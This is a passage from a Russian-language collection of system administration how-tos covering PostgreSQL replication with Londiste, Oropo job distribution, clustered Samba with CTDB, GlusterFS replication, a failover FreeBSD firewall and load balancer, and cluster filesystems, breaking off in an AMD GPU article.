pg_dumpall дампит эту роль). 2.3. Создаём конфигурацию репликатора Для каждой из реплицируемых баз создадим конфигурационные файлы: /etc/skytools/db1-londiste.ini: [londiste] job_name = db1-londiste provider_db = dbname=db1 port=5432 host=host1 subscriber_db = dbname=db1 # Это будет использоваться в качестве SQL-идентификатора, т.ч. не используйте # точки и пробелы. # ВАЖНО! Если есть живая репликация на другой слейв, именуем очередь так-же pgq_queue_name = db1-londiste-queue logfile = /var/log/skytools/%(job_name)s.log pidfile = /var/run/skytools/%(job_name)s.pid log_size = 5242880 log_count = 3 2.4. Устанавливаем Londiste в базы на мастере и слейве Теперь необходимо установить служебный SQL для каждой из созданных в предыдущем пункте конфигураций. Устанавливаем код на стороне мастера: python londiste.py /etc/skytools/db1-londiste.ini provider install и подобным образом на стороне слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber install После этого пункта на мастере будут созданы очереди для репликации. 2.5. Запускаем процессы Londiste Для каждой реплицируемой базы делаем: python londiste.py /etc/skytools/db1-londiste.ini replay -d Таким образом запустятся слушатели очередей репликации, но, т.к. мы ещё не указывали какие таблицы хотим реплицировать, они пока будут работать в холостую. Убедимся что в логах нет ошибок (/var/log/skytools/db1-londistes.log). 2.6. Добавляем реплицируемые таблицы Для каждой конфигурации указываем что будем реплицировать с мастера: python londiste.py /etc/skytools/db1-londiste.ini provider add --all и что со слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber add --all В данном примере я использую спец-параметр --all, который означает все таблицы, но вместо него вы можете перечислить список конкретных таблиц, если не хотите реплицировать все. 2.7. Добавляем реплицируемые последовательности (sequence) Так же для всех конфигураций. Для мастера: python londiste.py /etc/skytools/db1-londiste.ini provider add-seq --all Замечание: В версиях SkyTools до 2.1.9 включительно была обнаружена ошибка при добавлением последовательностей на мастере используя параметр --all, т.ч. если у вас такая версия используйте следующий хак: for seq in $( psql -t -A -U postgres toozla -c "\ds" | awk -F '|' '{ if ($1 != "pgq" && $1 != "londiste") { print $1"."$2 } }'); do python londiste.py /etc/skytools/db1-londiste.ini provider add-seq $seq; done Для слейва: python londiste.py /etc/skytools/db1-londiste.ini subscriber add-seq --all Точно также как и с таблицами можно указать конкретные последовательности вместо --all. 2.8. Проверка Итак, всё что надо сделано. Теперь Londiste запустит так называемый bulk copy процесс, который массово (с помощью COPY) зальёт присутствующие на момент добавления таблиц данные на слейв, а затем перейдёт в состояние обычной репликации. Мониторим логи на предмет ошибок: less /var/log/skytools/db1-londiste.log Если всё хорошо, смотрим состояние репликации. Данные уже синхронизированы для тех таблиц, где статус отображается как "ok". python londiste.py /etc/skytools/db1-londiste.ini subscriber tables Table State public.table1 ok public.table2 ok public.table3 in-copy public.table4 - public.table5 - public.table6 - ... Для удобства представляю следующий трюк с уведомление в почту об окончании первоначального копирования (мыло поменять на своё ;): ( while [ $( python londiste.py /etc/skytools/db1-londiste.ini subscriber tables | tail -n+2 | awk '{print $2}' | grep -v ok | wc -l) -ne 0 ]; do sleep 60; done; echo '' | mail -s 'Replication done EOM' user@domain.com ) & Ссылки на публикации, которые мне помогли в написании этой статьи: SkyTools - PostgreSQL Wiki http://wiki.postgresql.org/wiki/Skytools SkyTools - Skype Developer Zone https://developer.skype.com/SkypeGarage/DbProjects/SkyTools PostgreSQL master slave(s) asynchronous replication - tail -f /dev/dim http://tapoueh.org/skytools.html

Обработка тысяч изображений на нескольких узлах при помощи Oropo (доп. ссылка 1) [комментарии]

Проект Oropo (http://www.oropo.org/) позволяет разнести обработку большого объема ресурсоемких операций на несколько машин в сети, организовав временный кластер. В качестве примера рассмотрим выполнение задачи уменьшения размера нескольких тысяч изображений с высоким разрешением. Для преобразования буде использовать стандартные утилиты из пакета libjpeg - djpeg и cjpeg. В итоге для обработки одной картинки создадим простой скрипт make_smaller.sh: #!/bin/bash QUALITY=30 if [ $# -ne 1 ]; then echo "arguments" 1>&2 exit 1; fi FILE_PATH=$1 djpeg $FILE_PATH | cjpeg -quality $QUALITY При выполнении операции на одном компьютере, нам бы потребовался последовательный перебор всех изображений в цикле: #!/bin/bash MAKE_SMALLER=$PWD/make_smaller.sh IMGS_DIR=$PWD/imgs TARGET_DIR=$PWD/imgs_smaller for file in $IMGS_DIR/*; do bash $MAKE_SMALLER $file > $TARGET_DIR/${file##*/} done Используя систему Oropo Executor можно легко распараллелить выполнение поставленной задачи на несколько машин в сети. Как видно из следующего скрипта, скрипт претерпел минимальные изменения, изображения все так же перебираются последовательно, а их распараллеливание вынесено целиком на плечи программы oropo-system-pusher. Processing parallelly #!/bin/bash MAKE_SMALLER=$PWD/make_smaller.sh IMGS_DIR=$PWD/imgs for file in $IMGS_DIR/*; do oropo-system-pusher -p "string:bash" -p "path:$MAKE_SMALLER" -p "path:$file" done Результат работы сохраняется в файлах /var/lib/oropo/response/*/0 Настройка Oropo Как видим, распаралелливание было организовано предельно просто, не более трудно настроить работу инфраструктуры Oropo в Debian и Ubuntu. Подключаем репозиторий с готовыми пакетами oropo, в /etc/apt/sources.list добавляем: deb http://students.mimuw.edu.pl/~ms209495/oropo/debian sid main Устанавливаем: sudo apt-get update sudo apt-get install oropo-system На узлах-обработчиках заданий ставим по аналогии Oropo Executor: sudo apt-get install ap-executor Настраиваем центральный управляющий узел, на котором будем инициировать выполнение заданий. Добавляем себя в группу oropo: adduser `whoami` oropo Добавляем IP-адреса узлов-обработчиков: oropo-monitor-ctl --id_prefix oropomonitor --add 192.168.1.2 oropo-monitor-ctl --id_prefix oropomonitor --add 192.168.1.3 oropo-monitor-ctl --id_prefix oropomonitor --add 192.168.1.4 Все готово !

Кластер Samba с использованием CTDB Автор: Панков Петр [комментарии]

Введение Данная статья описывает механизм развертывания файлового сервера на предварительно поднятом кластере высокой готовности (High-Aviability). Предполагается, что все кластерные службы, а так же службы обеспечения высокой готовности настроены и запущены. В моем случае, кластер состоит из 2-х узлов. Собственно ПО Поясню выбор ПО и, собственно, для чего это все делается. 1. Чтобы поднять кластер из соединенных между собой каналами связи серверов, необходимо установить некоторые службы для централизованного управления ресурсами, а также использовать кластерную ФС для организации общего хранилища. В случае, если используется ОС от RedHat, сюда входят: - CMAN - или cluster manager - служба управления кластером. демон, который соединяет и отсоединяет узлы от кластера. Выполняется на каждой ноде; - CCSD - это демон, который обеспечивает доступ к файлу конфигурации(cluster.conf) другим кластерным приложениям. Выполняется на каждом узле; - fencing - часть кластерной системы конфигурации. Этот демон блокирует доступ узлу, с которым отсутствует связь, к общим ресурсам кластера. - GFS2 в качестве кластерной ФС. 2. Чтобы поднять кластер высокой готовности, необходимо решить ряд задач, а именно, обеспечить целостность данных и доступность ресурсов при отказе одного из узлов. - DRBD. По сути, сетевой RAID1. Используется для репликации данных. Таким образом данные всегда доступны при отказе одного из узлов. Начиная с версии 8, DRBD позволяет организовать работу всех устройств в режиме "primary", в отличае от предыдущих версий, где primary устройство было единственное. - HeartBeat. Механизизм "сердцебиения". Эта служба "наблюдает" за узлами, и, в случае, отказа одного из них, передает задачу другому, рабочему узлу. Таким образом, достигается доступность сервисов. 3. Чтобы поднять файловый сервер на данном кластере и использовать его для Windows-клиентов, необходимо использовать Samba'у. Текущая версия Samba не поддерживает развертывание её на кластере из-за свеобразного механизма работы. Поясню: Samba использует легковесную базу данных (TDB) для приведения соответствия Windows SID к Unix UID/GID (таблицы ID-мэппинга), хранения данных об открытых сессиях (session.tdb), таблицу блокировок файловой системы (locking.tdb), а также ряд других параметров. Если использовать классическую конфигурацию на кластере "как есть", получим следующее: На каждом узле работает свой демон smbd и каждый узел имеет свою копию TDB, причем эти TDB никак не связаны между собой и не имеют механизма взаимодействия. Это и является проблемой. Необходимо, чтобы все узлы кластера "знали" в каждый момент времени некоторые значения из всех TDB. Ключевым здесь является - locking.tdb и session.tdb. Для этих целей и используется CTDB. CTDB преобразует стандартный механизм работы Samba с TDB: все локальные locking.tdb и session.tdb - преобразуются в распределенную базу данных, таблицы ID-мэппинга остаются под управлением локальных демонов smbd. CTDB также осуществляет управление демонами smbd и производит передачу управления демоном smbd в случае отказа узла. Подведем некоторые итоги Имеем следующее: -кластерную систему, которая используется как файловый сервер. Для этого используем службу Samba, запущенную одновременно на всех узлах - за её работу отвечает CTDB. Данные хранятся на локальных дисках, реплицируются с помощью DRBD, доступ к ним может осуществляться одновременно обоими узлами кластера(для этого и нужна кластерная ФС - GFS2). Таким образом, потеря данных исключена, доступность сервисов обеспечена. Служба HeartBeat в данном случае не используется, так как CTDB выполняет эти функции для Samba-сервера. В результате, получим: высокопроизводительный файловый сервер, обеспечивающий 100%-ю целостность данных и непрырывность предоставляемых сервисов. Установка, настройка и запуск То, что описано ниже, делаем на всех узлах кластера. Для начала собираем CTDB из исходных текстов cd ctdb ./autogen.sh ./configure make make install После этого необходимо создать и отредактировать основные конфигурационные файлы, служащие для запуска и работы CTDB. 1. Создать файл /etc/sysconfig/ctdb.sysconfig: CTDB_RECOVERY_LOCK="/synchronized/lock" CTDB_PUBLIC_INTERFACE=eth0 CTDB_PUBLIC_ADDRESSES=/usr/local/etc/ctdb/public_addresses CTDB_MANAGES_SAMBA=yes CTDB_INIT_STYLE=redhat CTDB_NODES=/usr/local/etc/ctdb/nodes CTDB_LOGFILE=/var/log/log.ctdb В данном случае, этот файл не использует все возможные параметры, а лишь те, которые необходимы в данном случае: CTDB_RECOVERY_LOCK="/synchronized/lock" - этот параметр описывает месторасположение файла, в котором хранится записи о том, какой из узлов является мастером восстановления. Файл lock должен располагаться на общем хранилище и быть доступным всем нодам,использующим CTDB. CTDB_PUBLIC_INTERFACE=eth0 - этот параметр описывает сетевой интерфейс, на котором в данный момент времени поднято сетевое соединение. CTDB_PUBLIC_ADDRESSES=/usr/local/etc/ctdb/public_addresses - этот параметр определяет файл, содержащий список IP-адресов, по которым клиенты, использующие Samba для доступа к файловым ресурсам, посылают запросы на соединение. Распределением этих адресов по нодам занимается CTDB. CTDB_MANAGES_SAMBA=yes - этот параметр определяет, будет ли CTDB управлять запуском Samba-сервера вместо стандартных сценариев управления, которые реализует операционная система. CTDB_INIT_STYLE=redhat - этот параметр описывает сценарии запуска служб для различных операционных систем. CTDB_NODES=/usr/local/etc/ctdb/nodes - этот параметр определяет файл, в котором хранится информация об узлах кластера. CTDB_LOGFILE=/var/log/log.ctdb - этот параметр определяет лог- файл, использующийся службой CTDB. 2. Создать файл /usr/local/etc/ctdb/nodes: 192.168.1.1 192.168.1.2 Здесь IP-адрес 192.168.1.1 принадлежит первой ноде, IP-адрес 192.168.1.2 - второй. 3. Создать файл /usr/local/etc/ctdb/public_addresses: 192.168.0.200/24 eth0 Это IP-адрес, за которым в DNS сервере закреплено доменное имя Samba-сервера. Далее собираем самбу cd samba-3.3.8/source ./autogen.sh ./configure --with-ctdb=/usr/src/ctdb --with-cluster-support \ --enable-pie=no --with-shared-modules=idmap_tdb2 make make install /usr/src/ctdb - каталог с исходными текстами CTDB, установленными ранее. Правим smb.conf Эти два параметра обязательно надо добавить в global. Остальное, по Вашим запросам. clustering = Yes idmap backend = tdb Запуск Samba Сначала запускаем CTDB на всех узлах кластера. /usr/local/sbin/ctdbd Проверяем, запустилось ли. ctdb status Если все конфигурационные файлы корректны,будет такое: Number of nodes:2 pnn:0 192.168.1.1 OK (THIS NODE) pnn:1 192.168.1.2 OK Generation:1087563258 Size:2 hash:0 lmaster:0 hash:1 lmaster:1 Recovery mode:NORMAL (0) Recovery master:0 Проверяем для начала параметры smb.conf /usr/local/samba/bin/testparm Load smb config files from /usr/local/samba/etc/smb.conf Processing section "[public]" Loaded services file OK. Server role: ROLE_STANDALONE Запускаем самбу: /usr/local/samba/sbin/smbd -D /usr/local/samba/sbin/smbd -D Далее, все как обычно, только не забывайте, что это не кластер, и все действия должны быть выполнены на всех узлах. Тестирование Для сравнения производительности Samba-сервера с использованием CTDB и без использования CTDB, а также возможностей файловой системы (общего хранилища) используется ряд тестовых модулей. Скорость чтения данных Чтение(MB/sec) Клиент 1 2 3 4 Samba без CTDB 2,15 2,16 2,13 2,09 Samba + CTDB 24,73 23,42 23,26 23,15 Сервер был доступен по кналу 1 Гб/с, поэтому суммарно использовано около 75% пропускной способности. Скорость записи идентична, не намного уступает, определяется скорее возможностями файловой системы. Замечу, что с ростом узлов (до 8) скорость доступа к данным (скорость чтения/записи) стремительно растет. Заключение Предложенный вариант кластеризации Samba позволяет достичь некоторых результатов: 1. Высокая надежность и отказоустойчивость (читайте про CTDB). Потеря данных исключена. 2. Показатели производительности по сравнению с 1-серверными системами отличные. Конфигурация годится для организации бюджетного кластерного файлового сервера, и при грамотной организации каналов связи (между узлами, клиент- сервер) обеспечит отличный уровень производительности. Список источников * http://ctdb.samba.org * http://wiki.samba.org/index.php/Clustered_Samba

Отказоустойчивое хранилище с автоматической репликацией на базе GlusterFS (доп. ссылка 1) Автор: petrov.pash [комментарии]

Инструкция по создании зеркалируемого (реплицированного) между двумя машинами хранилища файлов на базе GlusterFS (http://www.gluster.com/) и Ubuntu 9.10. Добавляемый в созданное хранилище файл на первом сервере буде сразу доступен на втором и наоборот, при этом данные на каждой машине будут использоваться из локального раздела, что обеспечивает значительно более высокую производительность, по сравнению с NFS. С особенности кластерной файловой системы GlusterFS можно познакомиться на данной странице. В рассматриваемой конфигурации задействованы три машины: два сервера (server1.example.com/192.168.0.100, server2.example.com/192.168.0.101) и один клиент (client1.example.com: IP адрес 192.168.0.102). Серверы выступают в роли машин для экспорта дисковых разделов, доступ к отказоустойчивому хранилищу осуществляется на стороне клиента. В представленном примере серверы и клиент размещены на разных машинах, но в реальных условиях клиентские и серверные составляющие обычно совмещены на одной машине. Соответствующую конфигурацию можно сгенерировать при помощи утилиты glusterfs-volgen. Установка серверной части GlusterFS на server1.example.com и server2.example.com: Так как GlusterFS доступен в стандартном репозитории Ubuntu 9.10, достаточно выполнить (сейчас и далее все действия выполняются под пользователем root): apt-get install glusterfs-server Для организации хранилища на сервере будем использовать каталог /data/export. Приводим файл конфигурации /etc/glusterfs/glusterfsd.vol на серверах в следующий вид: volume posix type storage/posix option directory /data/export end-volume volume locks type features/locks subvolumes posix end-volume volume brick type performance/io-threads option thread-count 8 subvolumes locks end-volume volume server type protocol/server option transport-type tcp # далее через запятую нужно перечислить IP или имена хостов клиентов # можно использовать маски вида 192.168.*, option auth.addr.brick.allow 192.168.0.102 subvolumes brick end-volume Запускаем сервер GlusterFS: /etc/init.d/glusterfs-server start Настройка клиента GlusterFS Для установки клиентской части GlusterFS выполняем: aptitude install glusterfs-client glusterfs-server Хранилище будем монтировать в каталог /mnt/glusterfs. Приводим файл конфигурации клиента /etc/glusterfs/glusterfs.vol в следующий вид: volume remote1 type protocol/client option transport-type tcp option remote-host 192.168.0.100 # server1.example.com option remote-subvolume brick end-volume volume remote2 type protocol/client option transport-type tcp option remote-host 192.168.0.101 # server2.example.com option remote-subvolume brick end-volume volume replicate type cluster/replicate subvolumes remote1 remote2 end-volume volume writebehind type performance/write-behind option window-size 1MB subvolumes replicate end-volume volume cache type performance/io-cache option cache-size 512MB subvolumes writebehind end-volume Монтируем файловую систему GlusterFS в каталог /mnt/glusterfs: glusterfs -f /etc/glusterfs/glusterfs.vol /mnt/glusterfs или mount -t glusterfs /etc/glusterfs/glusterfs.vol /mnt/glusterfs Для автоматизации монтирования во время загрузки в /etc/fstab сдедует добавить: /etc/glusterfs/glusterfs.vol /mnt/glusterfs glusterfs defaults 0 0 Тестирование Создаем в GlusterFS разделе на стороне клиента несколько файлов: touch /mnt/glusterfs/test1 touch /mnt/glusterfs/test2 Эти файла сразу должны появиться на серверах в каталоге /data/export Выключим первый сервер и добавить на стороне клиента еще несколько файлов: touch /mnt/glusterfs/test3 touch /mnt/glusterfs/test4 rm -f /mnt/glusterfs/test2 Изменения должны появиться на втором сервере. Включим первый сервер и увидим, что данные на нем неактуальны. Изменения будут синхронизированы автоматически, для инициирования синхронизации на стороне клиента достаточно выполнить любую операцию с разделом, например, посмотреть содержимое через "ls -l /mnt/glusterfs/". GlusterFS в роли замены NFS с поддержкой кэширования. Чтобы примонтировать раздел в NFS-подобном виде, без репликации, достаточно добавить в конфигурации сервера в блоке "volume locks" опцию "option mandatory-locks on". На стороне клиента нужно закомментировать в конфигурации блок "volume replicate" и убрать блок, описывающий вторую реплицируемую директорию "volume remote2". В секции "volume writebehind" на стороне клиента при этом заменяем опцию "subvolumes replicate" на "subvolumes remote", а также можем уменьшить размер окна до 1 Мб ("option window-size 1MB"). Создание распределенного на 4 узла хранилища При реализации хранилища, распределенного на 4 узла, настройка производится аналогично, по аналогии с remote2 добавляются разделы remote3 и remote4. Вместо "volume replicate" добавляется раздел "volume distribute": ... volume remote3 type protocol/client option transport-type tcp option remote-host server3.example.com option remote-subvolume brick end-volume volume remote4 type protocol/client option transport-type tcp option remote-host server4.example.com option remote-subvolume brick end-volume volume distribute type cluster/distribute subvolumes remote1 remote2 remote3 remote4 end-volume ... В блоке "volume writebehind" приписывается "subvolumes distribute". Конфигурацию можно сгенерировать автоматически, например, запустив на одном из серверов: glusterfs-volgen --name repstore1 --raid 1 hostname1:/export/sdb1 \ hostname2:/export/sdb1 hostname3:/export/sdb1 hostname4:/export/sdb1 При надлежащей настройке параметров доступа к серверам все параметры конфигурации серверных и клиентских составляющих на всех машинах распределенного хранилища будут обновлены автоматически. Для систем не поддерживающих GlusterFS доступ к хранилищу можно организовать через NFS, SMB или WebDAV.

Как сделать отказоустойчивый брандмауэр с распределением нагрузки на FreeBSD (доп. ссылка 1) Автор: Сгибнев Михаил [комментарии]

Задача: Сконфигурировать два или более отказоустойчивых брандмауэра на базе IPF с функцией балансировки нагрузки (далее - "FWLB") для кластера, предоставляющего сервис в сети Интернет. Если один из брандмауэров приходит в негодность, то его функции будет выполнять второй. В этом случае мы получим высокодоступную систему с черезвычайно малым временем простоя и, как мы надеемся, сэкономит немало средств на специализированных устройствах. Наша задача - получить нижепреведенную конфигурацию: ~~~ ( net ) ~~~ | | | ---------- | switch | ---------- / \ / VIP \ --------- -------- | fwlb1 | | fwlb2 | --------- -------- \ VIP / \ / --------- | switch | --------- / \ / \ --------- --------- | server1 | | server2 | --------- --------- Где первый VIP (Virtual IP) это публичный IP адресс вашего сайта, а второй - приватный IP согласно RFC 1918, который будет использоваться серверами в качестве шлюза по умолчанию. Требования: - Два сервера с FreeBSD-STABLE. У каждого из них - по 2 сетевые карты - Два коммутатора/хаба - Два или более серверов для кластера, на котором запущен предоставляемый сервис - /usr/ports/net/pen - /usr/ports/net/freevrrpd - /usr/ports/sysutils/daemontools или /usr/ports/sysutils/runit - Ядро, скомпилированное с опциями IPFILTER и IPFILTER_LOG Pen является простым, но гибким балансировщиком. FreeVRRPd будет обеспечивать отказоустойчивость. Daemontools(или runit, с более дружественной лицензией и похожим функционалом) не является необходимым, но весьма полезен для контроля и управления процессами, поэтому тоже рекомендован к использованию. Выполнение: Часть 1: Брандмауэр Создайте набор правил IPF(или IPFW, или PF), разрешающий трафик на стороне сервиса, который нуждается в балансировке. По желанию, разрешите доступ к кластеру серверов через NAT, если есть необходимость в исходящих соединениях. Конфигурирование IPF/IPNAT не рассматривается в данной статье, но на эту тему написано достаточно много. Два пункта, которые очень важно иметь в виду, заключаются в том, что вам необходимо удостовериться, что разрешен multicast между брандмауэрами (необходимо для работы VRRP) и запрещен для всех других хостов (иначе возникнет угроза безопасности). Для получения ополнительной информации по IPF, обратитесь к: http://www.nwo.net/ipf/ipf-howto.html http://coombs.anu.edu.au/~avalon/ip-filter.html Скомпилировав ядро с опциями, указанными выше, вносим следующие изменения в /etc/rc.conf: ipfilter_enable="YES" ipfilter_rules="/etc/ipf.conf" ipnat_rules="/etc/ipnat.conf" ipnat_flags="-CF" ipmon_enable="YES" И переносим набор правил в указанные места. Часть 2: Балансировщик 1) Создаем необходимых пользователей и каталоги. mkdir -p /etc/supervise/pen/log mkdir -p /var/chroot/pen mkdir -p /var/log/pen pw useradd pen -s /bin/false -d /var/chroot/pen pw useradd penlog -s /bin/false -d /var/chroot/pen chown penlog:pen /var/log/pen 2) Создаем файлы, необходимые для запуска pen. cd /etc/supervise/pen cat << _EOF_ > run #!/bin/sh exec 2>&1 exec pen -d -u pen -j /var/chroot/pen -C localhost:8888 -f -r 80 hostname1 hostname2 _EOF_ chmod 755 run cd log cat << _EOF_ > run #!/bin/sh exec /usr/local/bin/setuidgid penlog /usr/local/bin/multilog s999999 n20 /var/log/pen _EOF_ chmod 755 run Так мы сконфигурируем pen для запуска в pen в /var/chroot/pen и портом управления 8888. Он будет балансировать входящий 80 порт на порт 80 hostname1 на hostname2. Тип балансировки - round-robin - если необходимы постоянные сессии, удалите флаг "-r". В этом примере pen запущен в режиме отладки, что упростит настройку. При промышленном использовании можно удалить флаг "-d". 3) Запуск балансировщика нагрузки. cd /service ln -s /etc/supervise/pen echo "csh -cf '/usr/local/bin/svscanboot &'" >> /etc/rc.local csh -cf '/usr/local/bin/svscanboot &' sleep 5 && svstat pen Теперь вы с помощью браузера можете удостовериться, что балансировка работает. Так же изучите /var/log/pen/current на обоих брандмауэрах. Часть 3: Отказоустойчивость 1) Сперва сконфигурируйте syslog для сбора сообщений VRRP. touch /var/log/freevrrpd.log cat << _EOF_ >> /etc/syslog.conf !freevrrpd *.* /var/log/freevrrpd.log _EOF_ 2) Конфигурирование FreeVRRPd До этого пункта, обе машины были равноправны. Теперь вам необходимо выбрать, какой FWLB будет primary. На этой машине скопируйте /usr/local/etc/freevrrpd.conf.sample в /usr/local/etc/freevrrpd.conf. Отредактируйте файл, как показано ниже: # public-facing VRID [VRID] serverid = 1 interface = fxp0 priority = 255 addr = 198.123.111.1/32 password = vrid1 vridsdep = 2 # backend VRID [VRID] serverid = 2 interface = fxp1 priority = 255 addr = 10.0.0.1/32 password = vrid2 vridsdep = 1 В результате мы получим 2 VRID - один для внешней сети, второй для внутренней, который будет использоваться кластером серверов. В этом примере оба VRIDs сконфигурированы, чтобы считать этот хост главным при выборах VRRP. Заметьте - оба VRID зависят друг от друга, что определено полем "vridsdep". Это означает, что, если один из интерфейсов в FWLB падает, другой автоматически перейдет в резервный режим, переводя оба интерфейса на резервный FWLB. Это позволит избежать попыток отправить данные через брандмауэр с упавшим внешним интерфейсом. Теперь вы должны скопировать этот файл на slave FWLB, и изменить оба поля priority на значение 100. Измените пароль на что-то более безопасное, чем на примере, но особо не расчитывайте на пароли VRRP в плане безопасности. Если другой брандмауэр, находящийся вне связки сможет общаться с вашими по VRRP, то у вас будут проблемы. 3) Запуск FreeVRRPd Теперь вы можете запустить freevrrpd на обоих брандмуэрах: cp /usr/local/etc/rc.d/freevrrpd.sh{.sample,} /usr/local/etc/rc.d/freevrrpd.sh start Часть 4: Проверка отказоустойчивости Теперь нам необходимо проверить получившуюся систему на отказоустойчивость. Сперва только надо запустить на обоих FWLB SSH, чтобы была возможность проверять правильность переключения интерфейсов. Попробуйте следующие сценарии: - С одной из машин кластера залогиньтесь по SSH на 10.0.0.1(внутренний интерфейс). Убедитесь, что это именно master FWLB. - Сделайте попытку соединения на 198.123.111.1(внешний интерфейс), порт 80 и посмотрите /var/log/pen/current, чтобы проверить факт соединения. - Отключить внешний интерфейс FWLB1. - Проверьте логи на FWLB2. Сделайте попытку соединения на 198.123.111.1, порт 80, чтобы проверить факт соединения. - Зайдите по SSH на 10.0.0.1. Вы должны увидеть FWLB2 в баннере SSH. - Подключите внешний интерфейс к FWLB1. Проверьте, что оба интерфейса FWLB1 вернулись в состояние master. Теперь повторите тест, отключая внутренний интерфейс. Если есть такое желание, то можно просто нажать Reset на FWLB1. Примечания: Удаление серверов из пула: Pen не может перманентно удалить сервера из пула, но мы можем указать ему игнорировать сервер, пока, например, идет его обновление или что-то подобное. Для этого выполните команду: penctl localhost:8888 server $servername blacklist 99999 Это поместит сервер в черный список на 99999 секунд. Для возвращения сервера в пул выполните команду: penctl localhost:8888 server $servername blacklist 1 Так мы выставим таймаут черного списка в 1 секунду, после чего сервер вернется в пул. Перманентное удаление или добавление серверов в пул: В случае, если есть необходимость добавить или удалить из пула несколько серверов, нужно отредактировать файл /service/pen/run. Просто добавьте имена хостов в конец команды запуска pen и выполните: svc -t /service/pen Эта команда пошлет сигнал TERM и перезапустит pen. Хотя эта операция и не должна сказаться на доступности сервиса, лучше такие вещи делать в специально определенное время. Ссылки: http://www.faqs.org/rfcs/rfc2338.html http://www.bsdshell.net/hut_fvrrpd.html http://siag.nu/pen/ http://cr.yp.to/daemontools.html http://smarden.org/runit © 2004 David Thiel --- lx [@ at @] redundancy.redundancy.org

Обзор сетевых и кластерных ФС: Lustre, GFS, AFS, GFarm (доп. ссылка 1) Автор: johnjoy [комментарии]
Lustre - кластерная ФС, AFS - сетевая ФС.
Если подробнее - то AFS относится примерно к тому классу, в котором сидят NFS, SMB, и win2K3 DFS. Основная их задача - качественный доступ к различным (раскиданным по сети) ресурсам, с соблюдением блокировок и напором на контроль доступа и централизованное управление. Здесь четко прослеживается модель "клиент-сервер" - большинство участников сетовой ФС являются клиентами, а под шары выделяются чаще отдельные серваки. С точки зрения производительности для такой ФС критериями являются пропускная способность сервер-клиент и количество поддерживаемых коннектов. Масштабируется такая ФС вертикально - более шустрым железом. Надежность тоже поддерживается на уровнях ниже сетевой ФС (RAID, репликация средствами ОС и администратором 24/7 на мобильном =)
Кластерных ФС известно негусто - навскидку Lustre, Google FS (+Hadoop), что-то было у IBM.
Отличительная особенность - все участники ФС унифицированы и являются и серверами и клиентами ФС (это именно особенности реализации, конечно же можно и настроить для работы как "несколько серверов - много клиентов", но преимуществ в этом случае не получите, скорее наоборот)
Обычный принцип действия - работа на уровне блоков: разбитый на блоки файл "размазывается" по нескольким серверам, при его чтении клиент сам собирает блоки в файл. (Комментарий Алексея: Это Google FS & RedHat GFS.. в люстре оперируют понятием объект).
Критерии оценки таких ФС - общая пропускная способность ФС кластера (то есть сколько гб/с крутится в пределах кластера) и латентность (задержка между запросом файла и его получением). Также тут важна надежность - все блоки реплицируются на уровне ФС, вылет нода не сказывается на работе кластера.
ФС этого класса очень разные. Lustre заточена под hiperf вычисления с низкой латентностью, посему пользуют что-нить типа InfiniBand и нестандартные MPI. Lustre замонтированая представляет из себя слегка урезaную ext3 для 2.4 ядер, для 2.6 используется ldiskfs которая значительно ближе к ext4.
Google FS и Hadoop - вообще с классической точки зрения не ФС, ибо ничего не монтируют а предоставляют RPC API для разработчиков. Рассчитаны они на гигантские объемы информации, работу в основном на чтение большими блоками (в мегабайтах, стандартный блок такой ФС - 32-64Мб) и в очень больших количествах.
Также есть shared storage FS - эти нужны при работе нескольких (многих) серверов с внешними дисковыми массивами. Основная задача - обеспечить быструю и правильную блокировку совместного доступа (via SAN, iSCSI, SCSI). Без них фактически каждый сервер должен работать со своим личным выделенным на массиве разделом. Из известных - GFS от RedHat, Oracle Cluster File System, PolyServe и Veritas CFS.
RedHat GFS - раздает raw девайс и пытается управлять блокировками на уровне блоков, без учета логической организации.
gfarm изначально позиционирует себя для таковой модели использования: есть много данных, распределенных по нодам, нужно их все параллельно обработать. В случае люстры и подобных - compute node сначала фетчит себе данные из кластерной фс, обрабатывает и возвращает обратно (отсюда требования к пропускной способности и латентности). В случае gfarm - задание по обработке для compute нода попадает благодаря gfarm именно на тот нод, где локально лежит одна из реплик требуемых данных. Соответственно по сети происходит трансфер задания на обработку данных , а не самих данных. (например, здесь, да и вообще тут- большинство тем именно parallel computing, а не distributed fs).
Некая сборная информация есть в wikipedia.

Поддержка аппаратного обеспечения

Использование в Linux дискретной видеокарты AMD Radeon вместе со встроенной Raven Ridge Автор: nobody [комментарии]

Разговор пойдёт об AMD APU Ryzen 3 2200G, Ryzen 5 2400G и подобных им. В обсуждениях на англоязычных форумах упоминается, что iGPU Vega10 более технологически продвинут, и, в принципе, он может быть использован как ведущий адаптер для dGPU предыдущих версий GCN 1,2,3 в рамках модели памяти iGPU Vega10 (GCN 5). Однако, с одной стороны это потребует большое количество человеко-часов для написания таких драйверов под OS Linux. А, с другой стороны, новые адаптеры линии RDNA полностью соответствуют этой модели памяти. И, в принципе, состыковка iGPU Vega10 с dGPU RDNA, есть задача более простая и более перспективная. Поэтому, в ближайшее время нормальной состыковки видеокарт GCN 1,2,3 и iGPU Vega10 (GCN 5) в Linux, судя по всему, ожидать не приходится. Соответственно, всё, что описано далее, это воркэраунд для сложившейся ситуации. Пошаговая инструкция Вот работоспособная конфигурация: (01) Устанавливаем Fedora 31 (я использовал версию с MATE GUI). Не забываем сразу добавить пользователя в группу video . (02) Загружаем пакет kernel-5.3.16-300.fc31.src.rpm, и разворачиваем его для компиляции в ${HOME}/rpmbuild/SOURCES/ (03) Идём на страничку https://github.com/RadeonOpenCompute/ROCK-Kernel-Driver/issues/66 и загружаем оттуда патч под нашу версию ядра 0003-allows-to-choose-iGPU-or-dGPU-memory-management-mode.patch.txt по ссылке https://github.com/RadeonOpenCompute/ROCK-Kernel-Driver/files/3614247/0003-allows-to-choose-iGPU-or-dGPU-memory-management-mode.patch.txt Попутно читаем на английском про особенности работы встроенной карты, там много удивительного. Выжимка, кому интересно, иначе можно пропустить:
модель памяти у iGPU и dGPU различна;
драйвер amdkfd по умолчанию использует модель памяти адаптера, проинициализировавшегося первым;
не смотря на то, что dGPU может быть первым и будет использована его модель памяти, тем не менее iGPU Vega10 более технологически продвинут и именно он получит первый номер во внутреннем дереве топологии драйвера amdkfd, что в общем-то неправильно, так как карта адаптеров и фактическое их наличие не будут соответствовать друг другу. Как результат, оба GPU будут нерабочими в ROCm (и не только в нём);
